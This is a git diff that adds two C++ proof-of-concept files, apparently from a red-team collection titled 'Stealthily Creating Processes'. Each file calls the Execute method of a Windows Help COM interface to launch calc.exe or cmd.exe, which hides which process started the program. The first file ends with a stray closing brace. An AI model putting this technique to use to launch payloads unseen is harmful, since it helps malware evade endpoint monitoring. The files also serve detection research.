diff --git a/Stealthily Creating Processes/IHxHelpPaneServer.cpp b/Stealthily Creating Processes/IHxHelpPaneServer.cpp new file mode 100644 index 0000000..d808d46 --- /dev/null +++ b/Stealthily Creating Processes/IHxHelpPaneServer.cpp @@ -0,0 +1,63 @@ +#include +#include + +struct __declspec(uuid("{8cec592c-07a1-11d9-b15e-000d56bfe6ee}")) + IHxHelpPaneServer : public IUnknown { + virtual HRESULT __stdcall DisplayTask(PWCHAR) = 0; + virtual HRESULT __stdcall DisplayContents(PWCHAR) = 0; + virtual HRESULT __stdcall DisplaySearchResults(PWCHAR) = 0; + virtual HRESULT __stdcall Execute(const PWCHAR) = 0; +}; + +DWORD Win32FromHResult(HRESULT Result) +{ + if ((Result & 0xFFFF0000) == MAKE_HRESULT(SEVERITY_ERROR, FACILITY_WIN32, 0)) + return HRESULT_CODE(Result); + + if (Result == S_OK) + return ERROR_SUCCESS; + + return ERROR_CAN_NOT_COMPLETE; +} + +HRESULT CoInitializeIHxHelpIds(LPGUID Clsid, LPGUID Iid) +{ + HRESULT Result = S_OK; + + if (!SUCCEEDED(Result = CLSIDFromString(L"{8cec58ae-07a1-11d9-b15e-000d56bfe6ee}", Clsid))) + return Result; + + if (!SUCCEEDED(Result = CLSIDFromString(L"{8cec592c-07a1-11d9-b15e-000d56bfe6ee}", Iid))) + return Result; + + return Result; +} + + +INT main(VOID) +{ + HRESULT Result = S_OK; + GUID CLSID_IHxHelpPaneServer; + GUID IID_IHxHelpPaneServer; + WCHAR pcUrl[256] = L"file:///C:/WINDOWS/SYSTEM32/CALC.EXE"; + IHxHelpPaneServer* Help = NULL; + + if (!SUCCEEDED(Result = CoInitializeIHxHelpIds(&CLSID_IHxHelpPaneServer, &IID_IHxHelpPaneServer))) + return Win32FromHResult(Result); + + if (!SUCCEEDED(Result = CoInitializeEx(NULL, COINIT_MULTITHREADED))) + return Win32FromHResult(Result); + + if (!SUCCEEDED(CoCreateInstance(CLSID_IHxHelpPaneServer, NULL, CLSCTX_ALL, IID_IHxHelpPaneServer, (PVOID*)&Help))) + return Win32FromHResult(Result); + + Result = Help->Execute(pcUrl); + + if (Help) + Help->Release(); + + CoUninitialize(); + + return Win32FromHResult(Result); +} +} \ No newline at end of file diff --git a/Stealthily Creating Processes/IHxInteractiveUser.cpp b/Stealthily Creating Processes/IHxInteractiveUser.cpp new file mode 100644 index 0000000..7ed4fd2 --- /dev/null +++ b/Stealthily Creating Processes/IHxInteractiveUser.cpp @@ -0,0 +1,59 @@ +#include +#include + +struct __declspec(uuid("8cec595b-07a1-11d9-b15e-000d56bfe6ee")) + IHxInteractiveUser : public IUnknown { + virtual VOID __stdcall Execute(PWCHAR pcUrl) = 0; +}; + +DWORD Win32FromHResult(HRESULT Result) +{ + if ((Result & 0xFFFF0000) == MAKE_HRESULT(SEVERITY_ERROR, FACILITY_WIN32, 0)) + return HRESULT_CODE(Result); + + if (Result == S_OK) + return ERROR_SUCCESS; + + return ERROR_CAN_NOT_COMPLETE; +} + +HRESULT CoInitializeIHxInteractiveUserIds(LPGUID Clsid, LPGUID Iid) +{ + HRESULT Result = S_OK; + + if (!SUCCEEDED(Result = CLSIDFromString(L"{8cec58e7-07a1-11d9-b15e-000d56bfe6ee}", Clsid))) + return Result; + + if (!SUCCEEDED(Result = CLSIDFromString(L"{8cec595b-07a1-11d9-b15e-000d56bfe6ee}", Iid))) + return Result; + + return Result; +} + + +INT main(VOID) +{ + HRESULT Result = S_OK; + GUID CLSID_IHxInteractiveUser; + GUID IID_IHxInteractiveUser; + WCHAR pcUrl[256] = L"file:///C:/WINDOWS/SYSTEM32/CMD.EXE"; + IHxInteractiveUser* User = NULL; + + if (!SUCCEEDED(Result = CoInitializeIHxInteractiveUserIds(&CLSID_IHxInteractiveUser, &IID_IHxInteractiveUser))) + return Win32FromHResult(Result); + + if (!SUCCEEDED(Result = CoInitializeEx(NULL, COINIT_MULTITHREADED))) + return Win32FromHResult(Result); + + if (!SUCCEEDED(Result = CoCreateInstance(CLSID_IHxInteractiveUser, NULL, CLSCTX_ALL, IID_IHxInteractiveUser, (PVOID*)&User))) + return Win32FromHResult(Result); + + User->Execute(pcUrl); + + if (User) + User->Release(); + + CoUninitialize(); + + return Win32FromHResult(Result); +} \ No newline at end of file